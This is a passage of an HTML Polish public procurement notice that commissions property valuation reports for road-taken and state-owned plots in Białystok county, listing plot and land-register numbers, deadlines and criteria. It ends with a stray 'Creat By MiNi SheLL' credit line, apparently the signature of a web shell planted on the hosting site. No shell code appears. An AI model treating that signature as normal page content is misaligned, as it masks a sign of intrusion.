GKN.683.122.2019;<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71319000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-06<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>część B</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości w podziale na następujące części:Część BWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), położonych na terenie powiatu białostockiego, niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości, wymienionych poniżej, które przejęte zostały pod drogi w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - w celu ustalenia za nie wysokości odszkodowania; przy wycenie wartości nieruchomości należy uwzględnić między innymi przepisy wynikające z rozporządzenia Rady Ministrów z dnia 4 września 2004 roku w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109 z późn. zm):1. Obręb Chodory gm. Turośń Kościelna – 2 działki, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.03.7.2011 z 11 lipca 2013 r. (droga powiatowa), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 99/1 o pow. 0,0028 ha, BIIB/00099267/7, sygn. 109.2014;2.	działka nr 76 o pow. 0,0039 ha, brak informacji o KW, sygn. 112.2014;2.Obręb Łapy II gm. Łapy – 1 działka, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.12.2016 z 24 października 2016 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.działka nr 697/1 o pow.0,0008 ha, brak informacji o KW, sygn. 53.2017 3.Obręb Czaplino gm. Choroszcz – 1 działka, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.18.2016 z 6 września 2016 r. (droga powiatowa), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.działka nr 53/25 o pow.0,0020 ha, brak informacji o KW, sygn. 345.2016;4.Obręb Ignatki gm. Juchnowiec Kościelny – 3 działki, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.28.2018 z 8 marca 2018 r. i decyzja Wojewody Podlaskiego z 30 sierpnia 2019r. AB-II.7821.6.2019.ED utrzymująca w mocy (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.działka nr 191/39 o pow.0,0012 ha, BI1B/00107605/9, sygn. 124.2019 2.działka nr 191/41 o pow.0,0050 ha, BI1B/00196684/6, sygn.125.2019;3.działka nr 192/1 o pow.0,0050 ha, BI1B/00218261/6, sygn.126.2019.Łącznie 7 działek<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71319000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-12<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>część C</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości w podziale na następujące części:Część CWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), położonych na terenie powiatu białostockiego, niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości, wymienionych poniżej, które przejęte zostały pod drogi w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - w celu ustalenia za nie wysokości odszkodowania; przy wycenie wartości nieruchomości należy uwzględnić między innymi przepisy wynikające z rozporządzenia Rady Ministrów z dnia 4 września 2004 roku w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109 z późn. zm):1.Obręb Zabłudów gm. Zabłudów – 36 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 1/18 o powierzchni 0,1328ha, ark.3, brak informacji o KW, sygn.akt.163.2019;2.	działka nr 8/33 o powierzchni 0,0044ha - ark.3, BI1B/00241865/0, 8/31 o powierzchni 0,0105 ha ark.3, BI1B/00239270/5, sygn.akt.164.2019;3.	działka nr 3/3 o powierzchni 0,0292ha, działka nr 3/5 o powierzchni 0,0571ha – ark.18, BI1B/00052127/3, sygn.akt.165.2019;4.	działka nr 4/35 o powierzchni 0,0022ha, działka nr 4/37 o powierzchni 0,0128ha - ark. 9, BI1B/00048027/1 sygn.akt.166.2019; 5.	działka nr 4/39 o powierzchni 0,0021ha, działka nr 4/41 o powierzchni 0,0111ha - ark. 19,BI1B/0048025/7 sygn.akt.167.2019;6.	działka nr 9/3 o powierzchni 0,0127ha - ark.20, BI1B/00259178/6, sygn.akt.168.2019;7.	działka nr 9/5 o powierzchni 0,0154ha, działka nr 11/11 o powierzchni 0,0473ha – ark.20, działka nr 5/12 o powierzchni 0,0511ha –ark.3, BI1B/00099449/7, sygn.akt.169.2019;8.	działka nr 10/20 o powierzchni 0,0609ha-ark.20, BI1B/00090490/6, sygn.akt.170.2019; 9.	działka nr 12/8 o powierzchni 0,0096ha-ark.21, BI1B/00235426/6, działka nr 7/29 o powierzchni 0,0291ha,działka nr 8/35 o powierzchni 0,0470ha – ark.19, działka nr 13/2 o powierzchni 0,0079ha, działka nr 14/5 o powierzchni 0,0077ha - ark.21, brak informacji o KW, sygn.akt.171.2019;10.	działka nr 15/12 o powierzchni 0,0197ha-ark.21, brak informacji o KW, sygn.akt.172.2019;11.	działka nr 6/24 o powierzchni 0,0123ha, działka nr 6/25 o powierzchni 0,0119ha – ark.3, BI1B/00224609/3 sygn.akt.173.2019;12.	działka nr 8/37 o powierzchni 0,0226ha – ark. 3, BI1B/00207075/5, sygn.akt.174.2019;13.	działka nr 4/43 o powierzchni 0,0010ha, działka nr 4/45 o powierzchni 0,0106ha–ark.19, BI1B/00048026/4 sygn.akt.175.2019;14.	działka nr 5/14 o powierzchni 0,0040ha - ark.19, BI1B/00057917/3, działka nr 5/16 o powierzchni 0,0076ha-ark.19, BI1B/00050791/4, sygn.akt.176.2019;15.	działka nr 5/20 o powierzchni 0,0094ha - ark.19, brak informacji o KW, sygn.akt.177.2019; 16.	działka nr 6/31 o powierzchni 0,0126ha - ark.19, BI1B/00208336/0, sygn.akt.178.2019;17.	działka nr 6/33 o powierzchni 0,0167ha - ark.19, BIIB/00208337/7, sygn.akt.179.2019;18.	działka nr 6/22 o powierzchni 0,0199ha, działka nr 6/27 o powierzchni 0,0148ha, działka nr 6/29 o powierzchni 0,0180ha - ark.3, BI1B/00085200/9, sygn.akt.180.2019;19.	działka nr 1/16 o powierzchni 0,0082ha - ark.18, BI1B/00045224/1, sygn.akt.181.2019;20.	działka nr 5/18 o powierzchni 0,0077ha - ark.19, BI1B/00176251/6, sygn.akt.182.2019; 21.	działka nr 4/47 o powierzchni 0,0203ha - ark.19, BI1B/00138475/4, sygn.akt.185.2019. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71319000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>część D</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości w podziale na następujące części:Część DWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), położonych na terenie powiatu białostockiego, niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości, wymienionych poniżej, które przejęte zostały pod drogi w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - w celu ustalenia za nie wysokości odszkodowania; przy wycenie wartości nieruchomości należy uwzględnić między innymi przepisy wynikające z rozporządzenia Rady Ministrów z dnia 4 września 2004 roku w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109 z późn. zm):1.Obręb Pasynki gm. Zabłudów – 4 działki, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 514/1 o powierzchni 0,0029ha, BI1B/00121002/6, sygn.akt.141.2019; 2.	działka nr 588/3 o powierzchni 0,0022ha, BI1B/00070516/9, sygn.akt.142.2019; 3.	działka nr 532/1 o powierzchni 0,0521ha, BI1B/00025381/3, sygn.akt.143.2019; 4.	działka nr 565/1 o powierzchni 0,1135ha, BI1B/00124858/2, sygn.akt.144.2019; 2.Obręb Zagruszany gm. Zabłudów – 13 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 2/1 o powierzchni 0,0527ha, BI1B/00051673/8, sygn.akt.145.2019; 2.	działka nr 3/1 o powierzchni 0,0285ha, działka nr 9/1 o powierzchni 0,0316ha, działka nr 1/1 o powierzchni 0,1329ha, działka nr 5/1 o powierzchni 0,1705ha, BI1B/00164057/2, sygn.akt.146.2019; 3.	działka nr 4/1 o powierzchni 0,0082ha, BI1B/00034186/2, sygn.akt.147.2019;4.	działka nr 6/1 o powierzchni 0,0156ha, BI1B/00019679/4, sygn.akt.148.2019; 5.	działka nr 8/1 o powierzchni 0,0151ha, BI1B/00048685/1, sygn.akt.149.2019;6.	działka nr 10/1 o powierzchni 0,0165ha, BI1B/00057735/3, sygn.akt.150.2019; 7.	działka nr 11/1 o powierzchni 0,0184ha, BI1B/00023871/1 , sygn.akt.151.2019;8.	działka nr 12/1 o powierzchni 0,0197ha, działka nr 29/1 o powierzchni 0,0013ha, BI1B/00044885/5, sygn.akt.152.2019; 9.	działka nr 7/1 o powierzchni 0,1403ha, BI1B/00074206/1, sygn.akt.153.2019. 3.Obręb Kucharówka gm. Zabłudów – 6 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 102/1 o powierzchni 0,0421ha, BI1B/00210325/7, sygn.akt.154.2019; 2.	działka nr 104/3 o powierzchni 0,0451ha, BI1B/00048240/0, sygn.akt.155.2019; 3.	działka nr 104/5 o powierzchni 0,0206ha, BI1B/00020693/8, sygn.akt.156.2019; 4.	działka nr 106/1 o powierzchni 0,0214ha, BI1B/00253852/3, sygn.akt.157.2019;5.	działka nr 108/1 o powierzchni 0,0301ha, BI1B/00128228/5, sygn.akt.158.2019; 6.	działka nr 110 o powierzchni 0,02ha, BI1B/00024517/9, sygn.akt.183.2019. 4.Obręb Kowalowce gm. Zabłudów – 8 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 18/17 o powierzchni 0,0774ha, działka nr 18/19 o powierzchni 0,0892ha, BI1B/00020693/8, sygn.akt.156.2019; 2.	działka nr 6/1 o powierzchni 0,0276ha, działka nr 2/1 o powierzchni 0,0173ha, działka nr 2/2 o powierzchni 0,0162ha, BI1B/00118556/0, sygn.akt.159.2019;3.	działka nr 5/1 o powierzchni 0,0152ha, BI1B/00256612/0, sygn.akt.160.2019;4.	działka nr 22/1 o powierzchni 0,0253ha, brak informacji o KW, sygn.akt.161.2019;5.	działka nr 1/3 o powierzchni 0,1316ha, BI1B/00029963/5, sygn.akt.162.2019. Łącznie 31 działek<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71319000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>część E</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości w podziale na następujące części:Część EWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), niezbędnych w prowadzonych postępowaniach, dotyczących:nieruchomości stanowiących własność Skarbu Państwa, przeznaczonych do przekształcenia prawa użytkowania wieczystego w prawo własności nieruchomości, oznaczonych jako działki nr: OBRĘB OGRODNICZKI, GMINA SUPRAŚL:1.	948/44 o powierzchni 0,1270 ha,2.	948/41 o powierzchni 0,1565 ha,3.	948/43 o powierzchni 0,0852 ha,4.	948/48 o powierzchni 0,2092 ha,5.	948/31 o powierzchni 0,2168 ha,6.	948/37 o powierzchni 0,0780 ha,7.	948/47 o powierzchni 0,2982 ha,8.	948/33 o powierzchni 0,0740 ha,9.	948/34 o powierzchni 0,0283 ha,10.	948/36 o powierzchni 0,1298 ha,11.	948/28 o powierzchni 0,1016 ha,12.	948/40 o powierzchni 0,1381 ha,13.	948/42 o powierzchni 0,0751 ha,14.	948/32 o powierzchni 0,0066 ha,15.	948/35 o powierzchni 0,2921 ha,16.	948/11 o powierzchni 0,5586 ha,17.	948/20 o powierzchni 0,3002 ha,18.	948/21 o powierzchni 0,3002 ha,19.	948/26 o powierzchni 1,8080 ha,20.	948/39 o powierzchni 0,1090 ha,21.	948/46 o powierzchni 3,6577 ha,22.	948/45 o powierzchni 0,0636 ha,23.	948/29 o powierzchni 0,0640 ha.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71319000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena ofertowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com